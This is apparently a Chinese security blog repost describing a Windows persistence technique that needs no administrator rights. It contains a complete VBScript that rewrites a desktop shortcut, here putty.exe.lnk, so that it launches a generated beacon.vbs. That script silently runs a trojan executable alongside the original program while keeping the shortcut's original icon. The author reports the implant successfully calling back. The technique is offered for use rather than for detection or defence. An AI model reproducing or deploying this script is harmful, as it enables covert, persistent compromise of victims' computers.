一种有趣的权限维持的方式

04/28 12:30
阅读数 42

这种方式我觉得挺好用的,且不需要管理员权限,我们都知道lnk文件可以指向一个exe文件,相当于一个快捷方式,所以我们可以更改指向的文件,指向我们的exe文件,但是这样的话原本的lnk文件就没用了,所以我们可以CreateShortcut方法来创建lnk快捷方式,在不损坏其原始lnk文件的情况下且可以执行我们的恶意文件。

如下vbs代码:

implant = "C:\tasks\恶意木马.exe"newTarget = "C:\tasks\beacon.vbs"lnkName = "C:\Users\Admin\Desktop\xxx.exe.lnk"
set WshShell = WScript.CreateObject("WScript.Shell" )strDesktop = WshShell.SpecialFolders("Desktop" )set oShellLink = WshShell.CreateShortcut(strDesktop & "\" & lnkName )origTarget = oShellLink.TargetPathorigArgs = oShellLink.ArgumentsorigIcon = oShellLink.IconLocationorigDir = oShellLink.WorkingDirectory
Set FSO = CreateObject("Scripting.FileSystemObject")Set File = FSO.CreateTextFile(newTarget,True)File.Write "Set oShell = WScript.CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")" & vbCrLfFile.Write "oShell.Run " & chr(34) & implant & chr(34) & vbCrLfFile.Write "oShell.Run " & chr(34) & oShellLink.TargetPath & " " & oShellLink.Arguments & chr(34) & vbCrLfFile.Close
oShellLink.TargetPath = newTargetoShellLink.IconLocation = origTarget & ", 0"oShellLink.WorkingDirectory = origDiroShellLink.WindowStyle = 7oShellLink.Save

脚本如下:

大概意思就是从桌面去获取到.lnk文件,然后更改其指向的目标文件,这种方法需要通过创建一个vbs文件来进行完成,这个vbs文件会执行原始文件和我们的木马文件。

wscrip pro.vbs

现在putty.exe.lnk文件已经被修改了。

可以看到文件指向的目标就是我们的beacon.vbs文件了。

而执行beacon.vbs文件,就会执行原始的程序以及我们的木马文件。

可以看到成功上线。

本节就先到这里,期待和您的下次相遇!!!

本文分享自微信公众号 - 黑白天实验室(li0981jing)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。

展开阅读全文
加载中
点击引领话题📣 发布并加入讨论🔥
打赏
0 评论
0 收藏
0
分享
返回顶部
顶部